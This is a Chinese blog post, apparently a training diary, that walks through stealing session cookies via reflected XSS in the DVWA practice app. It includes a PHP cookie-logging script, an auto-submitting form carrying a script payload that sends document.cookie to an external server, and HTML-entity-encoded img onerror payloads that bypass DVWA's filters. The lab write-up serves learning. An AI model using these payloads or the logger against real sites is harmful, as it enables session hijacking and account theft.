DVWA XSS 盗取cookie实战

版权声明:本文为博主原创文章,遵循 CC 4.0 by-sa 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44077544/article/details/95771570

集训第二周 星期五

就装了个nessus,然后就开会去了。

集训第二周 星期六

今天把dvwa的XSS的漏洞又给利用了一下,以前都是弹个框就没了,这次要试试盗cookie。这次说一个东西,很基础的东西,但我也是现在才明白,就是关于html编码,绕过过滤的事情。以前总感觉HTML编码绕过滤,这个方法时灵时不灵,直到现在,才发现原来是自己的问题。

这个东西要么用十六进制&#X**,要么用十进制&#ASCLL,我以前竟然傻的直接把十六进制的X给去了,就当十进制用了,我说为啥一直不能用了。晕

靶机IP:192.168.120.131

攻击IP:10.0.0.46

服务器IP:120.79.171.2 、 域名:cmumu.vip

flag.php

<?php
$cookie=$_GET['cookie'];
echo "我得到了你的cookie";
$log=fopen("cookie.txt","a");
fwrite($log,$cookie."\n");
fclose($log);
?>

1.low~medium

在这里插入图片描述因为这一关并没做任何过滤,所以我们直接构造构造payload,盗取cookie,至于构造原理,可以看我的前一篇文章,XSS配合CSRF的利用 获取cookie

<html>
<script>
     function submit()
     {
         var form=document.getElementById("go");
		 form.submit();
	 }
</script>
        <body onload="submit()">
                <form id="go"  action="http://192.168.120.131/DVWA-master/vulnerabilities/xss_r/">
                        <input type="hidden" name="name" value="<Script>document.location='http://cmumu.vip/flag.php?cookie='+document.cookie</script>">
                </form>
        </body>
</html>

把这个代码保存到自己的服务器或者PHP study的www目录下(靶机可访问),保存为csrf.php,我是保存在了自己的电脑上,于是就有了 http://10.0.0.46/scrf.php 。一旦受害者访问这个URL,表单就对自动跳转到DVWA的页面,让后自动提交表单。
在这里插入图片描述然后我们的服务器上就会多一个叫cookie.txt的文件。在里面就会有靶机用户的cookie。我们现在访问 http://192.168.120.131/DVWA-master/index.php 发现访问不了,需要登陆
在这里插入图片描述于是我们在加上刚才的cookie,再试试。发现成功访问。medium和low等级一样,就是把low的scrf.php中的script改成大写,就可以了。
在这里插入图片描述

2.high

本来high我也想用CSRF的,但是有一些编码问题,没有解决,目前不知道为什么,所以就只能给一个payload了。这两个都可以,这关主要是过滤,用HTML编码就可以绕过了,但是再用CSRF的时候,不知道为什么HTML编码会被转码,以至于就被过滤了。以后再说吧。

<img src="x" onerror='document.location.href="http://120.79.171.2/flag.php?cookie="+documen&#116;.cookie'>

<img src="x" onerror='locat&#x69;on.href="http://120.79.171.2/flag.php?cookie="+document.cookie'>
展开阅读全文

没有更多推荐了,返回首页